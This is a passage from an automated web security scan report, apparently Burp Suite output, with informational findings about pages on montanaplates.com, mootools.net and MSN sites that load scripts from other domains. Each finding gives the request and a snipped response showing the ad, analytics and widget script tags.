...[SNIP]...
</script><script type="text/javascript" src="http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>

</script>
...[SNIP]...

18.198. http://montanaplates.com/archive-2010-06.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://montanaplates.com
Path:	/archive-2010-06.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en
http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm

Request

GET /archive-2010-06.html HTTP/1.1
Host: montanaplates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:32:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Cont
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script><script type="text/javascript" src="http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>

</script>
...[SNIP]...

18.199. http://montanaplates.com/archive-2010-07.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://montanaplates.com
Path:	/archive-2010-07.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en
http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm

Request

GET /archive-2010-07.html HTTP/1.1
Host: montanaplates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:32:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Cont
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script><script type="text/javascript" src="http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>

</script>
...[SNIP]...

18.200. http://montanaplates.com/archive-2010-08.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://montanaplates.com
Path:	/archive-2010-08.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en
http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm

Request

GET /archive-2010-08.html HTTP/1.1
Host: montanaplates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:32:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31280

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Cont
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script><script type="text/javascript" src="http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>

</script>
...[SNIP]...

18.201. http://montanaplates.com/archive-2010-09.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://montanaplates.com
Path:	/archive-2010-09.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en
http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm

Request

GET /archive-2010-09.html HTTP/1.1
Host: montanaplates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:32:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Cont
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script><script type="text/javascript" src="http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>

</script>
...[SNIP]...

18.202. http://montanaplates.com/archive-2010-10.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://montanaplates.com
Path:	/archive-2010-10.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en
http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm

Request

GET /archive-2010-10.html HTTP/1.1
Host: montanaplates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:32:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24801

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Cont
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script><script type="text/javascript" src="http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>

</script>
...[SNIP]...

18.203. http://montanaplates.com/archive-2010-11.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://montanaplates.com
Path:	/archive-2010-11.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en
http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm

Request

GET /archive-2010-11.html HTTP/1.1
Host: montanaplates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:32:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31244

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Cont
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script><script type="text/javascript" src="http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>

</script>
...[SNIP]...

18.204. http://montanaplates.com/archive-2010-12.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://montanaplates.com
Path:	/archive-2010-12.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en
http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm

Request

GET /archive-2010-12.html HTTP/1.1
Host: montanaplates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:32:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35799

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Cont
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script><script type="text/javascript" src="http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>

</script>
...[SNIP]...

18.205. http://montanaplates.com/archive-2011-01.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://montanaplates.com
Path:	/archive-2011-01.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en
http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm

Request

GET /archive-2011-01.html HTTP/1.1
Host: montanaplates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:32:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Cont
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007928592904246141037%3A1czrhrtqhmm"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script><script type="text/javascript" src="http://sociallist.org/widget.js?type=1&cols=3&rows=10&button_dx=160&button_dy=160&lang=en"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>

</script>
...[SNIP]...

18.206. http://mootools.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mootools.net
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/6310.js
http://www.google-analytics.com/ga.js

Request

GET / HTTP/1.1
Host: mootools.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:35:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 9651

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-e
...[SNIP]...


   <script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/6310.js"> </script>
...[SNIP]...

18.207. http://mootools.net/developers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mootools.net
Path:	/developers

Issue detail

The response dynamically includes the following scripts from other domains:

http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/6310.js
http://www.google-analytics.com/ga.js

Request

GET /developers HTTP/1.1
Host: mootools.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:35:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 14931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-e
...[SNIP]...


   <script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/6310.js"> </script>
...[SNIP]...

18.208. http://movies.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.msn.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://help.live.com/resources/neutral/launchhelp.js

Request

GET / HTTP/1.1
Host: movies.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 89016
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=ac2682d41e5a4a9e995a518357a307fd; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Server: wba08
Date: Wed, 02 Feb 2011 15:35:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
MSN Movies
...[SNIP]...
</script>
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

18.209. http://movies.msn.com/movies/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.msn.com
Path:	/movies/article.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://help.live.com/resources/neutral/launchhelp.js

Request

GET /movies/article.aspx?news=625907 HTTP/1.1
Host: movies.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.210. http://movies.msn.com/new-on-dvd/movies/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.msn.com
Path:	/new-on-dvd/movies/

Issue detail

The response dynamically includes the following scripts from other domains:

http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://help.live.com/resources/neutral/launchhelp.js
http://img.widgets.video.s-msn.com/js/embed.js

Request

GET /new-on-dvd/movies/ HTTP/1.1
Host: movies.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 62538
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=3846db8e912c4c41babf7bbf1d72ec94; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Server: wba06
Date: Wed, 02 Feb 2011 15:35:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
New on DVD
...[SNIP]...
</style>
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
 <SCRIPT language=javascript type=text/javascript src="http://img.widgets.video.s-msn.com/js/embed.js"></SCRIPT>
...[SNIP]...
<script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

18.211. http://movies.msn.com/paralleluniverse/5-demonic-possession-movies/story/across-the-universe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.msn.com
Path:	/paralleluniverse/5-demonic-possession-movies/story/across-the-universe/

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://help.live.com/resources/neutral/launchhelp.js
http://img1.video.s-msn.com/v/js/MsnVideoUx.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 49419
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=c64fe33f4baf49b3bc5808d8f4db0984; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Server: wba08
Date: Wed, 02 Feb 2011 15:35:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Parallel U
...[SNIP]...
</link>

<script type=text/javascript language=javascript src="http://img1.video.s-msn.com/v/js/MsnVideoUx.js"></script>
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
</DIV> <SCRIPT src="http://connect.facebook.net/en_US/all.js#appId=137011316310142&xfbml=1"></SCRIPT>
...[SNIP]...
<script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

18.212. http://movies.msn.com/paralleluniverse/henry-cavill-is-superman/story/across-the-universe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.msn.com
Path:	/paralleluniverse/henry-cavill-is-superman/story/across-the-universe/

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://help.live.com/resources/neutral/launchhelp.js
http://img1.video.s-msn.com/v/js/MsnVideoUx.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 51588
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=bf272adeee6c4734bab84b966f463dd6; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Server: CO1ENTWBA07
Date: Wed, 02 Feb 2011 15:35:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Parallel U
...[SNIP]...
</link>

<script type=text/javascript language=javascript src="http://img1.video.s-msn.com/v/js/MsnVideoUx.js"></script>
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
</DIV> <SCRIPT src="http://connect.facebook.net/en_US/all.js#appId=137011316310142&xfbml=1"></SCRIPT>
...[SNIP]...
<script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

18.213. http://movies.msn.com/paralleluniverse/in-praise-of-buried/story/across-the-universe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.msn.com
Path:	/paralleluniverse/in-praise-of-buried/story/across-the-universe/

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://help.live.com/resources/neutral/launchhelp.js
http://img1.video.s-msn.com/v/js/MsnVideoUx.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 46178
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=e597dff1d43e4f20abc3e13f769d3925; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Server: wba05
Date: Wed, 02 Feb 2011 15:35:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Parallel U
...[SNIP]...
</link>

<script type=text/javascript language=javascript src="http://img1.video.s-msn.com/v/js/MsnVideoUx.js"></script>
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
</DIV> <SCRIPT src="http://connect.facebook.net/en_US/all.js#appId=137011316310142&xfbml=1"></SCRIPT>
...[SNIP]...
<script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

18.214. http://movies.msn.com/paralleluniverse/new-sci-fi-from-alien-ashes/story/across-the-universe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.msn.com
Path:	/paralleluniverse/new-sci-fi-from-alien-ashes/story/across-the-universe/

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://help.live.com/resources/neutral/launchhelp.js
http://img1.video.s-msn.com/v/js/MsnVideoUx.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 50703
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=ad9eb7cabd0844bdab83df2bf8a2e6fd; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Server: wba02
Date: Wed, 02 Feb 2011 15:35:20 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Parallel U
...[SNIP]...
</link>

<script type=text/javascript language=javascript src="http://img1.video.s-msn.com/v/js/MsnVideoUx.js"></script>
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
</DIV> <SCRIPT src="http://connect.facebook.net/en_US/all.js#appId=137011316310142&xfbml=1"></SCRIPT>
...[SNIP]...
<script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

18.215. http://movies.msn.com/the-rundown/the-guard/story_5/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.msn.com
Path:	/the-rundown/the-guard/story_5/

Issue detail

The response dynamically includes the following scripts from other domains:

http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://help.live.com/resources/neutral/launchhelp.js

Request

GET /the-rundown/the-guard/story_5/ HTTP/1.1
Host: movies.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 65365
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=d3e5f9ccee7f4c1b92909d2eb7b20019; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Server: wba14
Date: Wed, 02 Feb 2011 15:35:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
MSN Movies
...[SNIP]...
</style>
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

18.216. http://music.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://music.msn.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://help.live.com/resources/neutral/launchhelp.js

Request

GET / HTTP/1.1
Host: music.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 94828
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=76b0d6e8fdae4428a122c2611de28248; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Server: wba18
